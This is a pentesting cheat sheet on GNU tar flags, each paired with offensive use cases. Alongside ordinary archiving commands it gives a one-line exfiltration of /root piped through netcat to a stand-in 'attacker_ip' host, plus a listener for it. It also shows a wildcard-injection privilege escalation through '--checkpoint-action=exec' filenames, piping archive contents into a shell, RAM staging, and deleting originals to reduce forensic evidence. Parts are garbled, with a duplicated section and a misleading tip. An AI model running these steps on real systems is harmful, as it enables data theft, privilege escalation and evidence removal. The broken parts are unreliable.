tar
Tar command: Useful usage flags with their exlanation and use cases.
This guide will walk you through different options, flags and where you might need them in active engagement.
Basic Commands
Creates a new archive
1
tar -cvf backup.tar /path/to/directory
- c β create
- v β verbose
- f β filename
What it does?
Recursively archives files/directories.Handling Corrupt Files
1
tar -cvf backup.tar /root --ignore-failed-read
Verify Archive Integrity
1
tar -cvf backup.tar /etc -W
Exfiltrating large datasets
Ensuring archive not corrupted
Deleting Original Files After Archiving
1
tar -cvf loot.tar /tmp/loot --remove-files
- Clean artifacts after staging
- Remove sensitive traces
Preserves Absolute Path
1
tar -P -cf archive.tar /etc/passwd
- Tar removes leading / by default as it;
- Prevent overwriting arbitrary system files on extraction
- Avoid archive extraction attacks
- Safer default behavior
Pentesting Use Cases:
- Data exfiltration staging
- Bundling loot
- Archiving sensitive directories before transfer
π‘ On compromised systems, tar is almost always installed β reliable for staging data.
Extract an archive
1
tar -xvf backup.tar
- x β extract
- v β verbose
- f β filename
What it does?
Extract archive contents.Keep old files
1
tar -xvf archive.tar -k
- Avoid damaging system
Do not overwrite if target is newer
1
tar -xvf archive.tar --keep-newer-files
Change Extraction Path
1
tar -xvf archive.tar -C /tmp
Unlink(Delete) befor extraction
1
tar -xUf archive.tar
- Deletes (unlinks) the existing file first.
- For each file:
- If file exists β remove it completely
- Then create fresh file
- Normal Tar behavior:
- Tar opens it
- Overwrites contents
- But file metadata may remain
Pentesting Use Cases:
- Deploying uploaded tools
- Unpacking privesc scripts
- Extracting backups found on system
π‘ Extracting untrusted archives can be dangerous (path traversal risk).
List Archive Content
1
tar -tvf backup.tar
- t β view
- v β verbose
- f β filename
What it does?
View archive contents without extracting.Pentesting Use Cases:
- Before extracting unknown archive:
1
tar -tf suspicious.tar
- Prevents accidental file overwrite
- Detects malicious archive entries like:
1
../../etc/passwd
βone-top-level
1
tar -xvf archive.tar --one-top-level=name(optional)
What it does?
Creates a new directory and extracts all files inside it. Prevents path traversal attacks.Pentesting Use Cases:
* Safe handling of untrusted archives
* Secure DevOps extraction
Append Files
1
tar -rf backup.tar newfile.txt
What it does?
Add files to end of archive.β οΈ Cannot be used on compressed archives.
Pentesting Use Cases:
- Add new loot incrementally without rebuilding archive.
Update (Append only if newer)
1
tar -uvf backup.tar file.txt
What it does?
Versioned archiving: Adds file only if newer than archived version.
It DOES NOT replace old copy β it appends a new version.
Archive may contain multiple versions.β οΈ Cannot be used on compressed archives.
To extract a specific version file from archive
1
tar -xvf backup.tar --occurrence=2 file.txt
Pentesting Use Cases:
- Incremental backups during long engagement
- Preserving timeline of file changes ***
Compare Archive to Filesystem
1
tar -dvf archive.tar
What it does?
- Compare archive with current filesystem.
- Detect modified files.
β οΈ Cannot be used on compressed archives.
Pentesting Use Cases:
- Forensic analysis
- Detect file tampering
π‘ Useful during post-exploitation cleanup. ***
Delete From Archive
1
tar --delete -f archive.tar file.txt
What it does?
- Remove file from archive.
β οΈ Cannot be used on compressed archives.
====================================================================
Intermediate Commands
Incremental Backup
1
tar -g snapshot.file -cvf backup.tar /home
What it does?
- Tracks filesystem changes using snapshot file.
β οΈ Cannot be used on compressed archives.
Pentesting Use Cases:
- Stealth data exfiltration
- Monitoring changed files
Usage
snapshot.filestores metadata about:inode numbers
timestamps
device numbers
- file state
1
tar -g snapshot.file -cvf backup2.tar /home
Now tar compares:
Current filesystem
- Data inside snapshot.file
And only archives:
Modified files and Newly created files
π₯ This makes backup2.tar much smaller.
Restore
You must extract in order:1 2 3 4 5
mkdir restore cd restore tar -xvf backup.tar tar -xvf backup2.tar -g /dev/null
Why /dev/null?
During creation
The snapshot file is actively used.
During extractionThe snapshot file is NOT used. But tarβs syntax requires that if archive was created with -g, you must also supply -g when extracting. Itβs a syntactic requirement, not a functional one.𧩠Why Tar Requires -g at Extraction
GNU tar stores special incremental metadata inside the archive:
Directory state
Deletion records
Dump level markers
When extracting incremental archives, tar switches into incremental restore mode only if -g is specified.
If you donβt use -g, tar may:
Ignore deletion markers
Not properly restore directory metadata
Behave differently with incremental archives
So -g tells tar:
βThis archive is incremental. Process it accordingly.β
π§ Why /dev/null Specifically?
During extraction:- Tar needs a filename after -g
- But it does NOT actually read the snapshot file
- It only checks that one is supplied
So we give it:1
/dev/null
Because:
- It exists
- Itβs harmless
- It contains nothing
- It discards any write attempts
Want to force a new full backup
1
tar -g snapshot.file --level=0 -cvf full.tar /home
- this truncates snapshot file
Sparse Files
1
tar -S -cvf db.tar database.img
What it does?
- Efficiently archives sparse files.
- Huge files with empty blocks.
- Example:
- VM disk images
- Database files
Pentesting Use Cases:
- Archiving VM images found on system
- Dumping database files efficiently ***
Sparse Files
1
tar -S -cvf db.tar database.img
What it does?
- Efficiently archives sparse files.
- Huge files with empty blocks.
- Example:
- VM disk images
- Database files
Pentesting Use Cases:
βto-command
1
tar -xf archive.tar --to-command=/bin/sh
- Tar will:
- Extract each file
- Pipe its contents to /bin/sh But /bin/sh expects commands, not file data.
1
tar -xf archive.tar --to-command='sh -c "echo pwned"'
or
1
tar -xf archive.tar --to-command='cat > /tmp/output'
- Tar will:
Pure in-memory streaming exfiltration
1
tar -czf - /root | nc attacker_ip 4444
- c β create archive
- z β gzip compress
- f - β write to stdout (NOT a file) | β pipe nc β send data over network
Tar never writes to disk. It streams directly to netcat.
Attacker Side
1
nc -lvnp 4444 > received.tgz
- l β listen
- v β verbose
- n β no DNS
- p 4444 β port 4444
received.tar.gz β save incoming data
Stream and auto-extract on receiver
1
nc -lvnp 4444 | tar -xzf -
Replace nc with ssh(more advanced)
1
tar -czf - ~/labdata | ssh user@remote 'cat > loot.tar.gz'
Victim Side
1
tar -czf - ~/labdata | nc 127.0.0.1 4444
- 127.0.0.1 = local machine
- No file created on disk
- Archive streamed through memory ***
In-memory Staging through
/dev/shm/dev/shmis:- A tmpfs filesystem
- Backed by RAM
- Not written to disk
- Cleared on reboot
1
tar -czf /dev/shm/cache.tgz /directory
Staging= preparing data before exfiltration.
In-memory staging = storing that staged data in RAM instead of disk. ***
Wildcard Injection Privesc
You can create malicious filenames(in same dir):
1 2
touch "--checkpoint=1" touch "--checkpoint-action=exec=sh shell.sh"
If a cron job runs:
1
tar -cf backup.tar *
Shell expands to:
1
tar -cf backup.tar file1.txt file2.txt --checkpoint=1 --checkpoint-action=exec=sh shell.sh
as tar interprets these as options:
1 2
--checkpoint=1 #Trigger a checkpoint every 1 record. --checkpoint-action=exec=sh shell.sh #At checkpoint, execute this command.
π‘ Use
--to stop option parsing:1 2
touch -- "--checkpoint=1" touch -- "--checkpoint-action=exec=sh shell.sh"
Other Usage
1
find / -name "*.tar*" 2>/dev/null
Search for backup files
- source code
- credentials
- old configs
1
tar -g snap -cvf loot.tar /tmp/data --remove-files
- Archive only new data, then remove originals.
- Less forensic evidence.
Related Commands & Tools
auditd= Linux Auditing System that records security-relevant events, system calls, and user activities to a log file
Further Check out